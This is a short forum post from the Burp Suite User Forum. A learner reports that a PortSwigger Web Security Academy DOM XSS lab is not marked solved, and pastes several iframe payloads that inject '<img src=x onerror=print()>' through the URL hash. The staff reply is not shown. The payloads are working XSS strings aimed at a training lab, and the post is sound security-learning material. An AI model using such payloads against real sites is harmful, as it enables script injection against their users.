The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

No solution seems to work on this lab

Geoffrey | Last updated: Jul 03, 2024 01:32PM UTC

Lab: DOM XSS in jQuery selector sink using a hashchange event I have tried <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print(1)>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print(1)>'"></iframe> I've tried both with a slash and without a slash between .net and #. Just to see I tried other variations as well. I have tried on edge, embedded, firefox, and chrome. It works when I go to view exploit, but the lab does not get solved when I deliver it.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 04:37PM UTC